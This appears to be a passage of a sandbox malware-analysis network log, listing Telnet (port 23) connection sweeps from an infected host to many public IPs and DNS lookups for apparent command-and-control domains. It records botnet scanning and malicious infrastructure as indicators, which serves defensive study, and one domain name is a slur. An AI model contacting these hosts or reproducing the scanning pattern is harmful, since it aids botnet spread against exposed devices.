            Nov 28, 2024 09:09:21.158632040 CET2345166151.128.126.144192.168.2.13
            Nov 28, 2024 09:09:21.158685923 CET4516623192.168.2.13151.128.126.144
            Nov 28, 2024 09:09:21.159434080 CET235721413.39.254.101192.168.2.13
            Nov 28, 2024 09:09:21.159492970 CET5721423192.168.2.1313.39.254.101
            Nov 28, 2024 09:09:21.160332918 CET234264897.8.50.18192.168.2.13
            Nov 28, 2024 09:09:21.160387039 CET4264823192.168.2.1397.8.50.18
            Nov 28, 2024 09:09:21.161173105 CET2346586128.57.243.51192.168.2.13
            Nov 28, 2024 09:09:21.161235094 CET4658623192.168.2.13128.57.243.51
            Nov 28, 2024 09:09:21.161962986 CET235442084.105.45.154192.168.2.13
            Nov 28, 2024 09:09:21.162022114 CET5442023192.168.2.1384.105.45.154
            Nov 28, 2024 09:09:21.162846088 CET2336762110.154.2.238192.168.2.13
            Nov 28, 2024 09:09:21.162995100 CET3676223192.168.2.13110.154.2.238
            Nov 28, 2024 09:09:21.163655996 CET233305030.94.236.121192.168.2.13
            Nov 28, 2024 09:09:21.163706064 CET3305023192.168.2.1330.94.236.121
            Nov 28, 2024 09:09:21.164568901 CET234743616.60.193.28192.168.2.13
            Nov 28, 2024 09:09:21.164627075 CET4743623192.168.2.1316.60.193.28
            Nov 28, 2024 09:09:21.165373087 CET234494498.45.62.139192.168.2.13
            Nov 28, 2024 09:09:21.165421963 CET4494423192.168.2.1398.45.62.139
            Nov 28, 2024 09:09:23.740777969 CET2340354221.167.50.57192.168.2.13
            Nov 28, 2024 09:09:23.740930080 CET4035423192.168.2.13221.167.50.57
            Nov 28, 2024 09:09:23.741832972 CET3547023192.168.2.13145.239.10.162
            Nov 28, 2024 09:09:23.861149073 CET2340354221.167.50.57192.168.2.13
            Nov 28, 2024 09:09:23.861948967 CET2335470145.239.10.162192.168.2.13
            Nov 28, 2024 09:09:23.862009048 CET3547023192.168.2.13145.239.10.162
            Nov 28, 2024 09:09:26.049067020 CET2335470145.239.10.162192.168.2.13
            Nov 28, 2024 09:09:26.049324989 CET3547023192.168.2.13145.239.10.162
            Nov 28, 2024 09:09:26.049926043 CET4494623192.168.2.13161.122.63.9
            Nov 28, 2024 09:09:26.169409037 CET2335470145.239.10.162192.168.2.13
            Nov 28, 2024 09:09:26.169759989 CET2344946161.122.63.9192.168.2.13
            Nov 28, 2024 09:09:26.169882059 CET4494623192.168.2.13161.122.63.9
            Nov 28, 2024 09:09:33.058955908 CET5906823192.168.2.1381.223.179.62
            Nov 28, 2024 09:09:33.059034109 CET4510223192.168.2.13138.11.29.60
            Nov 28, 2024 09:09:33.059055090 CET4358223192.168.2.13134.21.140.48
            Nov 28, 2024 09:09:33.059104919 CET3407423192.168.2.1340.41.140.132
            Nov 28, 2024 09:09:33.059124947 CET5695423192.168.2.1376.135.171.121
            Nov 28, 2024 09:09:33.059154987 CET4997023192.168.2.13136.93.154.175
            Nov 28, 2024 09:09:33.059175968 CET4031823192.168.2.1312.6.30.250
            Nov 28, 2024 09:09:33.059200048 CET3468423192.168.2.1371.55.229.131
            Nov 28, 2024 09:09:33.059230089 CET4473223192.168.2.13213.20.21.175
            Nov 28, 2024 09:09:33.059266090 CET4656623192.168.2.1352.139.101.13
            Nov 28, 2024 09:09:33.059288025 CET4516623192.168.2.13151.128.126.144
            Nov 28, 2024 09:09:33.059304953 CET5721423192.168.2.1313.39.254.101
            Nov 28, 2024 09:09:33.059345007 CET4264823192.168.2.1397.8.50.18
            Nov 28, 2024 09:09:33.059353113 CET4658623192.168.2.13128.57.243.51
            Nov 28, 2024 09:09:33.059362888 CET5442023192.168.2.1384.105.45.154
            Nov 28, 2024 09:09:33.059385061 CET3676223192.168.2.13110.154.2.238
            Nov 28, 2024 09:09:33.059408903 CET3305023192.168.2.1330.94.236.121
            Nov 28, 2024 09:09:33.059451103 CET4743623192.168.2.1316.60.193.28
            Nov 28, 2024 09:09:33.059458971 CET4494423192.168.2.1398.45.62.139
            Nov 28, 2024 09:09:33.179419041 CET235906881.223.179.62192.168.2.13
            Nov 28, 2024 09:09:33.179497004 CET2343582134.21.140.48192.168.2.13
            Nov 28, 2024 09:09:33.179498911 CET5906823192.168.2.1381.223.179.62
            Nov 28, 2024 09:09:33.179508924 CET2345102138.11.29.60192.168.2.13
            Nov 28, 2024 09:09:33.179558992 CET4510223192.168.2.13138.11.29.60
            Nov 28, 2024 09:09:33.179569960 CET233407440.41.140.132192.168.2.13
            Nov 28, 2024 09:09:33.179579973 CET235695476.135.171.121192.168.2.13
            Nov 28, 2024 09:09:33.179589033 CET2349970136.93.154.175192.168.2.13
            Nov 28, 2024 09:09:33.179620028 CET234031812.6.30.250192.168.2.13
            Nov 28, 2024 09:09:33.179630995 CET233468471.55.229.131192.168.2.13
            Nov 28, 2024 09:09:33.179632902 CET4997023192.168.2.13136.93.154.175
            Nov 28, 2024 09:09:33.179651976 CET2344732213.20.21.175192.168.2.13
            Nov 28, 2024 09:09:33.179672956 CET4031823192.168.2.1312.6.30.250
            Nov 28, 2024 09:09:33.179692984 CET3468423192.168.2.1371.55.229.131
            Nov 28, 2024 09:09:33.179702044 CET234656652.139.101.13192.168.2.13
            Nov 28, 2024 09:09:33.179718018 CET4358223192.168.2.13134.21.140.48
            Nov 28, 2024 09:09:33.179723024 CET4473223192.168.2.13213.20.21.175
            Nov 28, 2024 09:09:33.179725885 CET2345166151.128.126.144192.168.2.13
            Nov 28, 2024 09:09:33.179735899 CET235721413.39.254.101192.168.2.13
            Nov 28, 2024 09:09:33.179795027 CET3407423192.168.2.1340.41.140.132
            Nov 28, 2024 09:09:33.179806948 CET5695423192.168.2.1376.135.171.121
            Nov 28, 2024 09:09:33.179878950 CET4656623192.168.2.1352.139.101.13
            Nov 28, 2024 09:09:33.179902077 CET5721423192.168.2.1313.39.254.101
            Nov 28, 2024 09:09:33.179905891 CET4516623192.168.2.13151.128.126.144
            Nov 28, 2024 09:09:33.180706024 CET234264897.8.50.18192.168.2.13
            Nov 28, 2024 09:09:33.180752993 CET2346586128.57.243.51192.168.2.13
            Nov 28, 2024 09:09:33.180777073 CET4264823192.168.2.1397.8.50.18
            Nov 28, 2024 09:09:33.180813074 CET4658623192.168.2.13128.57.243.51
            Nov 28, 2024 09:09:33.180815935 CET235442084.105.45.154192.168.2.13
            Nov 28, 2024 09:09:33.180854082 CET2336762110.154.2.238192.168.2.13
            Nov 28, 2024 09:09:33.180865049 CET233305030.94.236.121192.168.2.13
            Nov 28, 2024 09:09:33.180866003 CET5442023192.168.2.1384.105.45.154
            Nov 28, 2024 09:09:33.180890083 CET234494498.45.62.139192.168.2.13
            Nov 28, 2024 09:09:33.180917978 CET3676223192.168.2.13110.154.2.238
            Nov 28, 2024 09:09:33.180922031 CET3305023192.168.2.1330.94.236.121
            Nov 28, 2024 09:09:33.180922031 CET4494423192.168.2.1398.45.62.139
            Nov 28, 2024 09:09:33.180938959 CET234743616.60.193.28192.168.2.13
            Nov 28, 2024 09:09:33.180994034 CET4743623192.168.2.1316.60.193.28
            Nov 28, 2024 09:09:35.063230991 CET5099423192.168.2.1354.70.106.13
            Nov 28, 2024 09:09:35.064125061 CET5218623192.168.2.1353.104.167.130
            Nov 28, 2024 09:09:35.064905882 CET3842223192.168.2.13142.156.162.253
            Nov 28, 2024 09:09:35.065668106 CET4068423192.168.2.13167.200.60.103
            Nov 28, 2024 09:09:35.066406965 CET4682223192.168.2.1323.36.80.17
            Nov 28, 2024 09:09:35.067156076 CET4349623192.168.2.1383.105.115.177
            Nov 28, 2024 09:09:35.067748070 CET5485223192.168.2.13104.249.172.85
            Nov 28, 2024 09:09:35.068337917 CET3637623192.168.2.1359.54.27.175
            Nov 28, 2024 09:09:35.068939924 CET5380423192.168.2.13116.204.67.40
            Nov 28, 2024 09:09:35.069565058 CET3372623192.168.2.13154.65.178.178
            Nov 28, 2024 09:09:35.070219040 CET3600423192.168.2.1356.90.6.34
            Nov 28, 2024 09:09:35.070862055 CET3692023192.168.2.13220.63.174.30
            Nov 28, 2024 09:09:35.071500063 CET5755823192.168.2.13188.138.37.216
            Nov 28, 2024 09:09:35.072143078 CET3662023192.168.2.1385.222.24.104
            Nov 28, 2024 09:09:35.072788000 CET3405623192.168.2.13107.57.59.199
            Nov 28, 2024 09:09:35.073442936 CET5668423192.168.2.13133.22.181.176
            Nov 28, 2024 09:09:35.074048996 CET3920823192.168.2.13223.206.235.231
            Nov 28, 2024 09:09:35.074646950 CET5394423192.168.2.1391.187.161.105
            Nov 28, 2024 09:09:35.075238943 CET3721223192.168.2.135.226.142.30
            Nov 28, 2024 09:09:35.183407068 CET235099454.70.106.13192.168.2.13
            Nov 28, 2024 09:09:35.183556080 CET5099423192.168.2.1354.70.106.13
            Nov 28, 2024 09:09:35.184032917 CET235218653.104.167.130192.168.2.13
            Nov 28, 2024 09:09:35.184187889 CET5218623192.168.2.1353.104.167.130
            Nov 28, 2024 09:09:35.184803963 CET2338422142.156.162.253192.168.2.13
            Nov 28, 2024 09:09:35.184869051 CET3842223192.168.2.13142.156.162.253
            Nov 28, 2024 09:09:35.185554981 CET2340684167.200.60.103192.168.2.13
            Nov 28, 2024 09:09:35.185622931 CET4068423192.168.2.13167.200.60.103
            Nov 28, 2024 09:09:35.186269999 CET234682223.36.80.17192.168.2.13
            Nov 28, 2024 09:09:35.186326027 CET4682223192.168.2.1323.36.80.17
            Nov 28, 2024 09:09:35.187104940 CET234349683.105.115.177192.168.2.13
            Nov 28, 2024 09:09:35.187161922 CET4349623192.168.2.1383.105.115.177
            Nov 28, 2024 09:09:35.187779903 CET2354852104.249.172.85192.168.2.13
            Nov 28, 2024 09:09:35.187875032 CET5485223192.168.2.13104.249.172.85
            Nov 28, 2024 09:09:35.188368082 CET233637659.54.27.175192.168.2.13
            Nov 28, 2024 09:09:35.188406944 CET3637623192.168.2.1359.54.27.175
            Nov 28, 2024 09:09:35.189091921 CET2353804116.204.67.40192.168.2.13
            Nov 28, 2024 09:09:35.189146042 CET5380423192.168.2.13116.204.67.40
            Nov 28, 2024 09:09:35.189608097 CET2333726154.65.178.178192.168.2.13
            Nov 28, 2024 09:09:35.189671040 CET3372623192.168.2.13154.65.178.178
            Nov 28, 2024 09:09:35.190404892 CET233600456.90.6.34192.168.2.13
            Nov 28, 2024 09:09:35.190466881 CET3600423192.168.2.1356.90.6.34
            Nov 28, 2024 09:09:35.190855980 CET2336920220.63.174.30192.168.2.13
            Nov 28, 2024 09:09:35.190897942 CET3692023192.168.2.13220.63.174.30
            Nov 28, 2024 09:09:35.191359997 CET2357558188.138.37.216192.168.2.13
            Nov 28, 2024 09:09:35.191396952 CET5755823192.168.2.13188.138.37.216
            Nov 28, 2024 09:09:35.192172050 CET233662085.222.24.104192.168.2.13
            Nov 28, 2024 09:09:35.192213058 CET3662023192.168.2.1385.222.24.104
            Nov 28, 2024 09:09:35.192620993 CET2334056107.57.59.199192.168.2.13
            Nov 28, 2024 09:09:35.192656040 CET3405623192.168.2.13107.57.59.199
            Nov 28, 2024 09:09:35.193339109 CET2356684133.22.181.176192.168.2.13
            Nov 28, 2024 09:09:35.193406105 CET5668423192.168.2.13133.22.181.176
            Nov 28, 2024 09:09:35.193906069 CET2339208223.206.235.231192.168.2.13
            Nov 28, 2024 09:09:35.193943977 CET3920823192.168.2.13223.206.235.231
            Nov 28, 2024 09:09:35.194519043 CET235394491.187.161.105192.168.2.13
            Nov 28, 2024 09:09:35.194572926 CET5394423192.168.2.1391.187.161.105
            Nov 28, 2024 09:09:35.195092916 CET23372125.226.142.30192.168.2.13
            Nov 28, 2024 09:09:35.195156097 CET3721223192.168.2.135.226.142.30
            Nov 28, 2024 09:09:38.079401970 CET4494623192.168.2.13161.122.63.9
            Nov 28, 2024 09:09:38.199539900 CET2344946161.122.63.9192.168.2.13
            Nov 28, 2024 09:09:38.199616909 CET4494623192.168.2.13161.122.63.9
            Nov 28, 2024 09:09:40.083108902 CET5921223192.168.2.1331.28.22.85
            Nov 28, 2024 09:09:40.203284025 CET235921231.28.22.85192.168.2.13
            Nov 28, 2024 09:09:40.203546047 CET5921223192.168.2.1331.28.22.85
            Nov 28, 2024 09:09:47.092664003 CET5099423192.168.2.1354.70.106.13
            Nov 28, 2024 09:09:47.092695951 CET5218623192.168.2.1353.104.167.130
            Nov 28, 2024 09:09:47.092701912 CET3842223192.168.2.13142.156.162.253
            Nov 28, 2024 09:09:47.092709064 CET4068423192.168.2.13167.200.60.103
            Nov 28, 2024 09:09:47.092725039 CET4682223192.168.2.1323.36.80.17
            Nov 28, 2024 09:09:47.092725992 CET3637623192.168.2.1359.54.27.175
            Nov 28, 2024 09:09:47.092725039 CET4349623192.168.2.1383.105.115.177
            Nov 28, 2024 09:09:47.092730999 CET5485223192.168.2.13104.249.172.85
            Nov 28, 2024 09:09:47.092739105 CET5380423192.168.2.13116.204.67.40
            Nov 28, 2024 09:09:47.092747927 CET3372623192.168.2.13154.65.178.178
            Nov 28, 2024 09:09:47.092767000 CET5755823192.168.2.13188.138.37.216
            Nov 28, 2024 09:09:47.092767000 CET3692023192.168.2.13220.63.174.30
            Nov 28, 2024 09:09:47.092767000 CET3662023192.168.2.1385.222.24.104
            Nov 28, 2024 09:09:47.092771053 CET3600423192.168.2.1356.90.6.34
            Nov 28, 2024 09:09:47.092777967 CET3405623192.168.2.13107.57.59.199
            Nov 28, 2024 09:09:47.092788935 CET5668423192.168.2.13133.22.181.176
            Nov 28, 2024 09:09:47.092803955 CET3920823192.168.2.13223.206.235.231
            Nov 28, 2024 09:09:47.092813015 CET5394423192.168.2.1391.187.161.105
            Nov 28, 2024 09:09:47.092823982 CET3721223192.168.2.135.226.142.30
            Nov 28, 2024 09:09:47.213048935 CET235099454.70.106.13192.168.2.13
            Nov 28, 2024 09:09:47.213115931 CET5099423192.168.2.1354.70.106.13
            Nov 28, 2024 09:09:47.213171005 CET235218653.104.167.130192.168.2.13
            Nov 28, 2024 09:09:47.213222027 CET5218623192.168.2.1353.104.167.130
            Nov 28, 2024 09:09:47.213258982 CET2338422142.156.162.253192.168.2.13
            Nov 28, 2024 09:09:47.213299990 CET3842223192.168.2.13142.156.162.253
            Nov 28, 2024 09:09:47.213340044 CET2340684167.200.60.103192.168.2.13
            Nov 28, 2024 09:09:47.213349104 CET234682223.36.80.17192.168.2.13
            Nov 28, 2024 09:09:47.213375092 CET233637659.54.27.175192.168.2.13
            Nov 28, 2024 09:09:47.213385105 CET234349683.105.115.177192.168.2.13
            Nov 28, 2024 09:09:47.213388920 CET4682223192.168.2.1323.36.80.17
            Nov 28, 2024 09:09:47.213392019 CET2354852104.249.172.85192.168.2.13
            Nov 28, 2024 09:09:47.213397026 CET2333726154.65.178.178192.168.2.13
            Nov 28, 2024 09:09:47.213397980 CET4068423192.168.2.13167.200.60.103
            Nov 28, 2024 09:09:47.213417053 CET2353804116.204.67.40192.168.2.13
            Nov 28, 2024 09:09:47.213417053 CET5485223192.168.2.13104.249.172.85
            Nov 28, 2024 09:09:47.213428020 CET2357558188.138.37.216192.168.2.13
            Nov 28, 2024 09:09:47.213445902 CET2336920220.63.174.30192.168.2.13
            Nov 28, 2024 09:09:47.213464022 CET233662085.222.24.104192.168.2.13
            Nov 28, 2024 09:09:47.213464975 CET3637623192.168.2.1359.54.27.175
            Nov 28, 2024 09:09:47.213473082 CET233600456.90.6.34192.168.2.13
            Nov 28, 2024 09:09:47.213494062 CET4349623192.168.2.1383.105.115.177
            Nov 28, 2024 09:09:47.213500023 CET2334056107.57.59.199192.168.2.13
            Nov 28, 2024 09:09:47.213510036 CET3372623192.168.2.13154.65.178.178
            Nov 28, 2024 09:09:47.213510990 CET2356684133.22.181.176192.168.2.13
            Nov 28, 2024 09:09:47.213512897 CET5755823192.168.2.13188.138.37.216
            Nov 28, 2024 09:09:47.213517904 CET3600423192.168.2.1356.90.6.34
            Nov 28, 2024 09:09:47.213529110 CET5668423192.168.2.13133.22.181.176
            Nov 28, 2024 09:09:47.213531971 CET3692023192.168.2.13220.63.174.30
            Nov 28, 2024 09:09:47.213531971 CET3662023192.168.2.1385.222.24.104
            Nov 28, 2024 09:09:47.213531971 CET3405623192.168.2.13107.57.59.199
            Nov 28, 2024 09:09:47.213639021 CET5380423192.168.2.13116.204.67.40
            Nov 28, 2024 09:09:47.213677883 CET2339208223.206.235.231192.168.2.13
            Nov 28, 2024 09:09:47.213712931 CET3920823192.168.2.13223.206.235.231
            Nov 28, 2024 09:09:47.214946032 CET235394491.187.161.105192.168.2.13
            Nov 28, 2024 09:09:47.214960098 CET23372125.226.142.30192.168.2.13
            Nov 28, 2024 09:09:47.214996099 CET5394423192.168.2.1391.187.161.105
            Nov 28, 2024 09:09:47.215001106 CET3721223192.168.2.135.226.142.30
            Nov 28, 2024 09:09:49.095597982 CET3724023192.168.2.13124.70.18.161
            Nov 28, 2024 09:09:49.096430063 CET5076423192.168.2.13192.143.182.146
            Nov 28, 2024 09:09:49.097306967 CET4896623192.168.2.13163.120.88.4
            Nov 28, 2024 09:09:49.098030090 CET3729623192.168.2.13148.75.143.61
            Nov 28, 2024 09:09:49.098886013 CET5006023192.168.2.13133.31.164.17
            Nov 28, 2024 09:09:49.099891901 CET5087223192.168.2.13153.185.55.39
            Nov 28, 2024 09:09:49.100594044 CET3714023192.168.2.13176.45.8.247
            Nov 28, 2024 09:09:49.101407051 CET5350423192.168.2.1385.174.70.238
            Nov 28, 2024 09:09:49.102269888 CET4476823192.168.2.1383.150.101.0
            Nov 28, 2024 09:09:49.102986097 CET5479623192.168.2.13146.247.34.98
            Nov 28, 2024 09:09:49.103787899 CET5907223192.168.2.13191.222.252.24
            Nov 28, 2024 09:09:49.104547977 CET5671223192.168.2.13190.86.187.203
            Nov 28, 2024 09:09:49.105336905 CET5269423192.168.2.1362.36.121.3
            Nov 28, 2024 09:09:49.106115103 CET3978623192.168.2.13151.149.109.244
            Nov 28, 2024 09:09:49.106904984 CET4211823192.168.2.13114.184.171.204
            Nov 28, 2024 09:09:49.107656956 CET3906623192.168.2.13162.113.63.188
            Nov 28, 2024 09:09:49.108505964 CET4413223192.168.2.1377.31.218.239
            Nov 28, 2024 09:09:49.109299898 CET5356823192.168.2.13193.9.191.139
            Nov 28, 2024 09:09:49.110040903 CET3367023192.168.2.13152.101.146.157
            Nov 28, 2024 09:09:49.216377020 CET2337240124.70.18.161192.168.2.13
            Nov 28, 2024 09:09:49.216397047 CET2350764192.143.182.146192.168.2.13
            Nov 28, 2024 09:09:49.216509104 CET3724023192.168.2.13124.70.18.161
            Nov 28, 2024 09:09:49.216542959 CET5076423192.168.2.13192.143.182.146
            Nov 28, 2024 09:09:49.217206955 CET2348966163.120.88.4192.168.2.13
            Nov 28, 2024 09:09:49.217271090 CET4896623192.168.2.13163.120.88.4
            Nov 28, 2024 09:09:49.217940092 CET2337296148.75.143.61192.168.2.13
            Nov 28, 2024 09:09:49.217986107 CET3729623192.168.2.13148.75.143.61
            Nov 28, 2024 09:09:49.218803883 CET2350060133.31.164.17192.168.2.13
            Nov 28, 2024 09:09:49.218988895 CET5006023192.168.2.13133.31.164.17
            Nov 28, 2024 09:09:49.219839096 CET2350872153.185.55.39192.168.2.13
            Nov 28, 2024 09:09:49.219883919 CET5087223192.168.2.13153.185.55.39
            Nov 28, 2024 09:09:49.220592022 CET2337140176.45.8.247192.168.2.13
            Nov 28, 2024 09:09:49.220647097 CET3714023192.168.2.13176.45.8.247
            Nov 28, 2024 09:09:49.221340895 CET235350485.174.70.238192.168.2.13
            Nov 28, 2024 09:09:49.221390963 CET5350423192.168.2.1385.174.70.238
            Nov 28, 2024 09:09:49.222268105 CET234476883.150.101.0192.168.2.13
            Nov 28, 2024 09:09:49.222353935 CET4476823192.168.2.1383.150.101.0
            Nov 28, 2024 09:09:49.222851992 CET2354796146.247.34.98192.168.2.13
            Nov 28, 2024 09:09:49.222898960 CET5479623192.168.2.13146.247.34.98
            Nov 28, 2024 09:09:49.223699093 CET2359072191.222.252.24192.168.2.13
            Nov 28, 2024 09:09:49.223743916 CET5907223192.168.2.13191.222.252.24
            Nov 28, 2024 09:09:49.224509001 CET2356712190.86.187.203192.168.2.13
            Nov 28, 2024 09:09:49.224553108 CET5671223192.168.2.13190.86.187.203
            Nov 28, 2024 09:09:49.225236893 CET235269462.36.121.3192.168.2.13
            Nov 28, 2024 09:09:49.225281000 CET5269423192.168.2.1362.36.121.3
            Nov 28, 2024 09:09:49.225966930 CET2339786151.149.109.244192.168.2.13
            Nov 28, 2024 09:09:49.226013899 CET3978623192.168.2.13151.149.109.244
            Nov 28, 2024 09:09:49.226808071 CET2342118114.184.171.204192.168.2.13
            Nov 28, 2024 09:09:49.226855040 CET4211823192.168.2.13114.184.171.204
            Nov 28, 2024 09:09:49.227570057 CET2339066162.113.63.188192.168.2.13
            Nov 28, 2024 09:09:49.227622032 CET3906623192.168.2.13162.113.63.188
            Nov 28, 2024 09:09:49.228393078 CET234413277.31.218.239192.168.2.13
            Nov 28, 2024 09:09:49.228435040 CET4413223192.168.2.1377.31.218.239
            Nov 28, 2024 09:09:49.229166985 CET2353568193.9.191.139192.168.2.13
            Nov 28, 2024 09:09:49.229280949 CET5356823192.168.2.13193.9.191.139
            Nov 28, 2024 09:09:49.229873896 CET2333670152.101.146.157192.168.2.13
            Nov 28, 2024 09:09:49.229919910 CET3367023192.168.2.13152.101.146.157
            Nov 28, 2024 09:09:51.516833067 CET2354796146.247.34.98192.168.2.13
            Nov 28, 2024 09:09:51.517056942 CET5479623192.168.2.13146.247.34.98
            Nov 28, 2024 09:09:51.517549992 CET4920423192.168.2.1314.15.126.160
            Nov 28, 2024 09:09:51.517966032 CET5921223192.168.2.1331.28.22.85
            Nov 28, 2024 09:09:51.637007952 CET2354796146.247.34.98192.168.2.13
            Nov 28, 2024 09:09:51.637490988 CET234920414.15.126.160192.168.2.13
            Nov 28, 2024 09:09:51.637593031 CET4920423192.168.2.1314.15.126.160
            Nov 28, 2024 09:09:51.637964010 CET235921231.28.22.85192.168.2.13
            Nov 28, 2024 09:09:51.638022900 CET5921223192.168.2.1331.28.22.85
            TimestampSource PortDest PortSource IPDest IP
            Nov 28, 2024 09:07:48.011368990 CET5448653192.168.2.13168.235.111.72
            Nov 28, 2024 09:07:48.326483965 CET5354486168.235.111.72192.168.2.13
            Nov 28, 2024 09:07:59.863359928 CET3945953192.168.2.1381.169.136.222
            Nov 28, 2024 09:08:00.108478069 CET533945981.169.136.222192.168.2.13
            Nov 28, 2024 09:08:12.350846052 CET5737753192.168.2.13168.235.111.72
            Nov 28, 2024 09:08:12.660495996 CET5357377168.235.111.72192.168.2.13
            Nov 28, 2024 09:08:24.903135061 CET5275553192.168.2.13185.181.61.24
            Nov 28, 2024 09:08:25.163192034 CET5352755185.181.61.24192.168.2.13
            Nov 28, 2024 09:08:37.367826939 CET5955553192.168.2.1351.158.108.203
            Nov 28, 2024 09:08:37.607537985 CET535955551.158.108.203192.168.2.13
            Nov 28, 2024 09:08:50.378607988 CET5738353192.168.2.13168.235.111.72
            Nov 28, 2024 09:08:50.695333004 CET5357383168.235.111.72192.168.2.13
            Nov 28, 2024 09:09:02.943476915 CET3980853192.168.2.13202.61.197.122
            Nov 28, 2024 09:09:03.192250967 CET5339808202.61.197.122192.168.2.13
            Nov 28, 2024 09:09:14.729777098 CET4384053192.168.2.1351.158.108.203
            Nov 28, 2024 09:09:14.978992939 CET534384051.158.108.203192.168.2.13
            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Nov 28, 2024 09:07:48.011368990 CET192.168.2.13168.235.111.720xb27dStandard query (0)netfags.geekA (IP address)IN (0x0001)false
            Nov 28, 2024 09:07:59.863359928 CET192.168.2.1381.169.136.2220x5ef0Standard query (0)burnthe.libreA (IP address)IN (0x0001)false
            Nov 28, 2024 09:08:12.350846052 CET192.168.2.13168.235.111.720x518cStandard query (0)burnthe.libreA (IP address)IN (0x0001)false
            Nov 28, 2024 09:08:24.903135061 CET192.168.2.13185.181.61.240x46ceStandard query (0)netfags.geek. [malformed]256505false
            Nov 28, 2024 09:08:37.367826939 CET192.168.2.1351.158.108.2030xdd21Standard query (0)burnthe.libreA (IP address)IN (0x0001)false
            Nov 28, 2024 09:08:50.378607988 CET192.168.2.13168.235.111.720xd22fStandard query (0)burnthe.libreA (IP address)IN (0x0001)false
            Nov 28, 2024 09:09:02.943476915 CET192.168.2.13202.61.197.1220x14baStandard query (0)netfags.geek. [malformed]256287false
            Nov 28, 2024 09:09:14.729777098 CET192.168.2.1351.158.108.2030x31aStandard query (0)netfags.geek. [malformed]256298false
            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Nov 28, 2024 09:07:48.326483965 CET168.235.111.72192.168.2.130xb27dNo error (0)netfags.geek154.213.187.242A (IP address)IN (0x0001)false
            Nov 28, 2024 09:07:48.326483965 CET168.235.111.72192.168.2.130xb27dNo error (0)netfags.geek154.213.187.245A (IP address)IN (0x0001)false
            Nov 28, 2024 09:07:48.326483965 CET168.235.111.72192.168.2.130xb27dNo error (0)netfags.geek154.213.187.247A (IP address)IN (0x0001)false
            Nov 28, 2024 09:07:48.326483965 CET168.235.111.72192.168.2.130xb27dNo error (0)netfags.geek154.213.187.248A (IP address)IN (0x0001)false
            Nov 28, 2024 09:07:48.326483965 CET168.235.111.72192.168.2.130xb27dNo error (0)netfags.geek154.213.187.249A (IP address)IN (0x0001)false
            Nov 28, 2024 09:07:48.326483965 CET168.235.111.72192.168.2.130xb27dNo error (0)netfags.geek154.213.187.214A (IP address)IN (0x0001)false
            Nov 28, 2024 09:07:48.326483965 CET168.235.111.72192.168.2.130xb27dNo error (0)netfags.geek154.213.187.213A (IP address)IN (0x0001)false
            Nov 28, 2024 09:08:00.108478069 CET81.169.136.222192.168.2.130x5ef0No error (0)burnthe.libre154.213.187.247A (IP address)IN (0x0001)false
            Nov 28, 2024 09:08:00.108478069 CET81.169.136.222192.168.2.130x5ef0No error (0)burnthe.libre154.213.187.214A (IP address)IN (0x0001)false
            Nov 28, 2024 09:08:00.108478069 CET81.169.136.222192.168.2.130x5ef0No error (0)burnthe.libre154.213.187.249A (IP address)IN (0x0001)false
            Nov 28, 2024 09:08:00.108478069 CET81.169.136.222192.168.2.130x5ef0No error (0)burnthe.libre154.213.187.245A (IP address)IN (0x0001)false
            Nov 28, 2024 09:08:00.108478069 CET81.169.136.222192.168.2.130x5ef0No error (0)burnthe.libre154.213.187.213A (IP address)IN (0x0001)false
            Nov 28, 2024 09:08:00.108478069 CET81.169.136.222192.168.2.130x5ef0No error (0)burnthe.libre154.213.187.248A (IP address)IN (0x0001)false
            Nov 28, 2024 09:08:00.108478069 CET81.169.136.222192.168.2.130x5ef0No error (0)burnthe.libre154.213.187.242A (IP address)IN (0x0001)false
            Nov 28, 2024 09:08:12.660495996 CET168.235.111.72192.168.2.130x518cNo error (0)burnthe.libre154.213.187.249A (IP address)IN (0x0001)false
            Nov 28, 2024 09:08:12.660495996 CET168.235.111.72192.168.2.130x518cNo error (0)burnthe.libre154.213.187.213A (IP address)IN (0x0001)false
            Nov 28, 2024 09:08:12.660495996 CET168.235.111.72192.168.2.130x518cNo error (0)burnthe.libre154.213.187.242A (IP address)IN (0x0001)false
            Nov 28, 2024 09:08:12.660495996 CET168.235.111.72192.168.2.130x518cNo error (0)burnthe.libre154.213.187.247A (IP address)IN (0x0001)false
            Nov 28, 2024 09:08:12.660495996 CET168.235.111.72192.168.2.130x518cNo error (0)burnthe.libre154.213.187.214A (IP address)IN (0x0001)false
            Nov 28, 2024 09:08:12.660495996 CET168.235.111.72192.168.2.130x518cNo error (0)burnthe.libre154.213.187.245A (IP address)IN (0x0001)false
            Nov 28, 2024 09:08:12.660495996 CET168.235.111.72192.168.2.130x518cNo error (0)burnthe.libre154.213.187.248A (IP address)IN (0x0001)false
            Nov 28, 2024 09:08:37.607537985 CET51.158.108.203192.168.2.130xdd21No error (0)burnthe.libre154.213.187.247A (IP address)IN (0x0001)false
            Nov 28, 2024 09:08:37.607537985 CET51.158.108.203192.168.2.130xdd21No error (0)burnthe.libre154.213.187.242A (IP address)IN (0x0001)false
            Nov 28, 2024 09:08:37.607537985 CET51.158.108.203192.168.2.130xdd21No error (0)burnthe.libre154.213.187.249A (IP address)IN (0x0001)false
            Nov 28, 2024 09:08:37.607537985 CET51.158.108.203192.168.2.130xdd21No error (0)burnthe.libre154.213.187.214A (IP address)IN (0x0001)false
            Nov 28, 2024 09:08:37.607537985 CET51.158.108.203192.168.2.130xdd21No error (0)burnthe.libre154.213.187.245A (IP address)IN (0x0001)false
            Nov 28, 2024 09:08:37.607537985 CET51.158.108.203192.168.2.130xdd21No error (0)burnthe.libre154.213.187.213A (IP address)IN (0x0001)false
            Nov 28, 2024 09:08:37.607537985 CET51.158.108.203192.168.2.130xdd21No error (0)burnthe.libre154.213.187.248A (IP address)IN (0x0001)false
            Nov 28, 2024 09:08:50.695333004 CET168.235.111.72192.168.2.130xd22fNo error (0)burnthe.libre154.213.187.249A (IP address)IN (0x0001)false
            Nov 28, 2024 09:08:50.695333004 CET168.235.111.72192.168.2.130xd22fNo error (0)burnthe.libre154.213.187.245A (IP address)IN (0x0001)false
            Nov 28, 2024 09:08:50.695333004 CET168.235.111.72192.168.2.130xd22fNo error (0)burnthe.libre154.213.187.242A (IP address)IN (0x0001)false
            Nov 28, 2024 09:08:50.695333004 CET168.235.111.72192.168.2.130xd22fNo error (0)burnthe.libre154.213.187.214A (IP address)IN (0x0001)false
            Nov 28, 2024 09:08:50.695333004 CET168.235.111.72192.168.2.130xd22fNo error (0)burnthe.libre154.213.187.213A (IP address)IN (0x0001)false
